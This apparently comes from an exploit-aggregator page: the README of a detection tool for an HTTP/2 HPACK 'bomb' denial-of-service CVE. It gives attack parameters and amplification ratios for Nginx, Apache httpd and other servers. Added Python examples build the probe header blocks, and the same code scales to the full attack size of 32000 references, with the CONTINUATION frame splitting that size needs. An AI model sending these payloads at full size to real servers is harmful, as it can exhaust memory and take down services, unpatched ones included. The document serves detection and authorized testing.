## https://sploitus.com/exploit?id=C2EB4AA1-0C70-5104-AF4C-BC274F5A5B7A
# http2-bomb-detector

> HTTP/2 Bomb (CVE-2026-49975) non-destructive vulnerability detection tool for Nginx / Apache httpd

## Vulnerability Background

CVE-2026-49975 is a remote denial-of-service vulnerability in the HTTP/2 protocol layer that affects many server implementations; it was discovered by security researcher Quang Luong. The bug abuses the interaction between **HPACK header compression** (one-byte indexed references to a dynamic-table entry) and the server's **stream handling**, which materialises a full header field for every reference. An unauthenticated attacker can exhaust 32 GB of server memory within 10–20 seconds.  
- **CVSS 3.1**: 9.8 (Critical)  
- **CWE**: CWE-789 (Memory Allocation with Excessive Size Value)  
- **Alias**: QVD-2026-30962  
- **Publication Date**: 2026-06-02  
- **PoC**: [beichenst/http2-bomb](https://github.com/beichenst/http2-bomb) | [califio/publications](https://github.com/califio/publications/tree/main/MADBugs/http2-bomb)

## Impact Scope

| Server | Affected Versions | Amplification (server memory : client bytes) | Fix Status |
|--------|-------------------|----------------------------------------------|------------|
| Apache httpd | 2.4.17 – 2.4.67 (mod_http2 < 2.0.41) | ~4,000:1 | ✅ Fixed |
| Nginx | < 1.29.8 | ~70:1 | ✅ Fixed |
| Envoy | ≤ 1.37.2 | ~5,700:1 | ❌ Not fixed |
| Microsoft IIS | Including Windows Server 2025 | ~68:1 | ❌ Not fixed |
| Cloudflare Pingora | ≤ 0.8.0 | ~62:1 | ❌ Not fixed |

## Detection Mechanism

The tool is built from the public PoCs and offers two detection modes, each sending a tiny version of the real attack payload:

### Nginx Mode
Detects **index reference bombs**: insert a dynamic table entry `("a", "")`, then send indexed references to it. Each reference costs 1 byte on the client side but 59 bytes of server memory (3 B pool copy + 56 B `ngx_table_elt_t`). Attack parameter: refs=32000; detection only needs refs=3.  
### Apache Mode
Detects **cookie crumb merging bombs**: `mod_http2` merges repeated `cookie` header fields (cookie crumbs) into a single header, concatenating them with `"; "` via `apr_table_setn`, and the merged crumbs are not counted against `LimitRequestFields`. Attack parameter: refs=4091 (amplification ~4000:1); detection only needs refs=3.  
### Decision Logic
- If the server answers with `ENHANCE_YOUR_CALM` → 🛡️ Protection in place
- If the server rejects the probe stream with `RST_STREAM` → 🛡️ Protection in place
- If the server answers with `GOAWAY` → 🛡️ Protection in place
- If the server silently accepts the probe → ⚠️ Possibly affected

A silently accepted 3-reference probe only shows that no rejection triggered at that size; it does not prove exploitability. Confirm against the fixed versions in the table above before reporting a finding.
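The following is an added example, not code from the http2-bomb-detector project or from the PoCs it is based on. It builds the two probe header blocks described above with a minimal HPACK encoder (RFC 7541), wraps them in HTTP/2 frames (RFC 9113, including the CONTINUATION split that the refs=32000 attack size would need), and applies the decision list above to raw frames read back from a server. The `:authority` value `example.com`, the choice of `GET /` pseudo-headers, and the reading of the httpd mode as a `("cookie", "")` dynamic-table entry are assumptions made here; the sample server replies in the usage section are constructed, not captured.

```python
"""Added example: HTTP/2 bomb probe construction and response classification."""
from __future__ import annotations
import struct

# Frame types, flags and error codes from RFC 9113 (sections 6 and 7)
HEADERS, RST_STREAM, SETTINGS, GOAWAY, CONTINUATION = 0x1, 0x3, 0x4, 0x7, 0x9
END_STREAM, END_HEADERS = 0x1, 0x4
ENHANCE_YOUR_CALM = 0xB
MAX_FRAME = 16384            # default SETTINGS_MAX_FRAME_SIZE
FIRST_DYNAMIC_INDEX = 62     # the static table has 61 entries (RFC 7541 Appendix A)
PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"


def hpack_int(value: int, prefix_bits: int, flags: int = 0) -> bytes:
    """RFC 7541 5.1 integer with an N-bit prefix; `flags` carries the pattern bits."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([flags | value])
    out = bytearray([flags | limit])
    value -= limit
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def hpack_string(s: bytes) -> bytes:
    """Raw string literal (H=0, 7-bit length prefix); Huffman coding is not needed."""
    return hpack_int(len(s), 7) + s


def indexed(index: int) -> bytes:
    """6.1 indexed field: one byte for any index < 127, which is the whole point of the bomb."""
    return hpack_int(index, 7, 0x80)


def literal_incremental(name, value: bytes) -> bytes:
    """6.2.1 literal with incremental indexing: adds one entry to the dynamic table.
    `name` is a static-table index (int) or a raw name (bytes)."""
    if isinstance(name, int):
        return hpack_int(name, 6, 0x40) + hpack_string(value)
    return hpack_int(0, 6, 0x40) + hpack_string(name) + hpack_string(value)


def literal_no_index(name_index: int, value: bytes) -> bytes:
    """6.2.2 literal without indexing, name taken from the table (4-bit prefix)."""
    return hpack_int(name_index, 4) + hpack_string(value)


def probe_header_block(mode: str, authority: bytes, refs: int) -> bytes:
    """Pseudo-headers, one dynamic-table insert, then `refs` one-byte references."""
    block = indexed(2) + indexed(7) + indexed(4)        # :method GET, :scheme https, :path /
    block += literal_no_index(1, authority)            # :authority (static index 1)
    if mode == "nginx":
        block += literal_incremental(b"a", b"")        # ("a", "") becomes dynamic index 62
    elif mode == "httpd":
        block += literal_incremental(32, b"")          # ("cookie", "") via static name index 32 (assumed reading)
    else:
        raise ValueError("mode must be 'nginx' or 'httpd'")
    return block + indexed(FIRST_DYNAMIC_INDEX) * refs


def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """RFC 9113 4.1: 24-bit length, 8-bit type, 8-bit flags, R bit + 31-bit stream id."""
    return (struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
            + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload)


def request_frames(block: bytes, stream_id: int = 1) -> list[bytes]:
    """HEADERS plus CONTINUATION frames when the block exceeds MAX_FRAME (refs=32000 does)."""
    chunks = [block[i:i + MAX_FRAME] for i in range(0, len(block), MAX_FRAME)]
    frames = []
    for i, chunk in enumerate(chunks):
        last = i == len(chunks) - 1
        ftype = HEADERS if i == 0 else CONTINUATION
        flags = (END_STREAM if i == 0 else 0) | (END_HEADERS if last else 0)
        frames.append(frame(ftype, flags, stream_id, chunk))
    return frames


def probe_bytes(mode: str, authority: bytes, refs: int = 3) -> bytes:
    """Everything a client sends after TLS with ALPN h2: preface, empty SETTINGS, request."""
    return PREFACE + frame(SETTINGS, 0, 0, b"") + b"".join(
        request_frames(probe_header_block(mode, authority, refs)))


def classify_response(data: bytes) -> str:
    """Apply the decision list above to the raw frames read back from the server."""
    off = 0
    while off + 9 <= len(data):
        length = int.from_bytes(data[off:off + 3], "big")
        ftype = data[off + 3]
        payload = data[off + 9:off + 9 + length]
        if ftype == GOAWAY and len(payload) >= 8:          # last-stream-id, then error code
            code = int.from_bytes(payload[4:8], "big")
            return "ENHANCE_YOUR_CALM" if code == ENHANCE_YOUR_CALM else "GOAWAY"
        if ftype == RST_STREAM and len(payload) >= 4:      # error code only
            code = int.from_bytes(payload[:4], "big")
            return "ENHANCE_YOUR_CALM" if code == ENHANCE_YOUR_CALM else "RST_STREAM"
        off += 9 + length
    return "silently accepted"


if __name__ == "__main__":
    print(probe_header_block("nginx", b"example.com", 3).hex())
    print(len(request_frames(probe_header_block("nginx", b"example.com", 32000))), "frames at refs=32000")
```

The 3-reference nginx probe is a 23-byte header block; at refs=32000 the same block is 32020 bytes and has to be split into a HEADERS frame and one CONTINUATION frame, which is why an attack tool needs the split and a probe does not. `classify_response` stops at the first RST_STREAM or GOAWAY; a constructed reply of a SETTINGS frame followed by a HEADERS frame carrying `:status 200` (`0x88`) is what "silently accepted" looks like on the wire.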

## Installation

**Zero dependencies**: only the Python standard library (`ssl`, `socket`, `struct`) is used.  
```bash
git clone https://github.com/adminlove520/http2-bomb-detector.git
cd http2-bomb-detector
```

Python 3.7+ required.  
## Usage

### Single-target Detection

```bash
# Automatic detection (Nginx + Apache modes)
python http2_bomb_detector.py --host example.com
```

### Modes and Options

```bash
# Run a single detection mode
python http2_bomb_detector.py --host example.com --mode nginx
python http2_bomb_detector.py --host example.com --mode httpd

# Specify the port
python http2_bomb_detector.py --host example.com --port 8443

# Output only vulnerability information without sending probe packets
python http2_bomb_detector.py --host example.com --no-probe

# Output in JSON format
python http2_bomb_detector.py --host example.com --json
```

### Batch detection

```bash
# Read the target list from a file
python http2_bomb_detector.py -f targets.txt

# Output the report
python http2_bomb_detector.py -f targets.txt -o report.txt
```

The `targets.txt` format (one target per line; lines starting with `#` are comments; a bare host defaults to port 443, a URL may carry an explicit port):
```
# List of web servers
example.com
https://example.org:8443
192.168.1.100
```
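A parser for the target-list format above, added here as an example and not taken from the project. Beyond what the format description states, it also accepts trailing `#` comments on a line and bracketed IPv6 literals, and it falls back to port 443 when none is given; those behaviours are assumptions of this example. The sample list is constructed.

```python
"""Added example: parse the targets.txt format into (host, port) pairs."""
from __future__ import annotations
from urllib.parse import urlsplit

DEFAULT_PORT = 443  # assumed default, matching the tool's TLS/ALPN h2 probe

# Constructed sample in the documented format, plus an IPv6 literal and an inline comment
SAMPLE_TARGETS = """# List of web servers
example.com
https://example.org:8443
192.168.1.100          # lab box
[2001:db8::1]:8443
"""


def parse_targets(text: str) -> list[tuple[str, int]]:
    """One target per line; '#' starts a comment; bare hosts and URLs both accepted."""
    targets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop full-line and trailing comments
        if not line:
            continue
        if "://" not in line:                 # bare host, host:port or [v6]:port
            line = "https://" + line
        parts = urlsplit(line)
        if not parts.hostname:
            raise ValueError(f"unparseable target: {raw!r}")
        targets.append((parts.hostname, parts.port or DEFAULT_PORT))
    return targets


if __name__ == "__main__":
    for host, port in parse_targets(SAMPLE_TARGETS):
        print(f"{host}:{port}")
```

`urlsplit` does the host/port splitting, which is what keeps `[2001:db8::1]:8443` from being mis-split on its colons; `parts.port` raises `ValueError` on a non-numeric port, so a malformed line fails loudly rather than being silently scanned on the wrong port.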

## Output example

```
  [INFO] Connected to example.com:443... [OK] HTTP/2 connection established
  [INFO] --- NGINX mode detection ---
  [INFO] Attack vector: HPACK index reference bomb: dynamic table entry ('a', '') × 32000 references
  [INFO] Fix version: 1.29.8 | Magnification ratio: ~70:1
  [INFO] Sending probe packet (refs=3, non-destructive)... [WARN] ⚠️ The server silently accepts the probe packet, potentially vulnerable!
  [INFO] --- HTTPD mode detection ---
  [INFO] Attack vector: Cookie crumb merging bomb: empty cookies × 4091 references
  [INFO] Fix version: mod_http2 2.0.41 / httpd 2.4.68 | Magnification ratio: ~4000:1
  [INFO] Sending probe packet (refs=3, non-destructive)... [OK] The server rejects the probe stream with RST_STREAM, protected
```

## Disclaimer

This tool is intended only for **authorized security testing**. Probing targets without authorization may violate the law; the user assumes all legal responsibility.

## References

- [CVE-2026-49975 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-49975)
- [Apache HTTP Server security bulletins](https://httpd.apache.org/security/vulnerabilities_24.html)
- [Original research blog on HTTP/2 bombs](https://blog.calif.io/p/codex-discovered-a-hidden-http2-bomb)
- [PoC code repository (beichenst)](https://github.com/beichenst/http2-bomb)
- [RFC 7541 - HPACK](https://www.rfc-editor.org/rfc/rfc7541)
- [RFC 9113 - HTTP/2](https://www.rfc-editor.org/rfc/rfc9113)

## License

MIT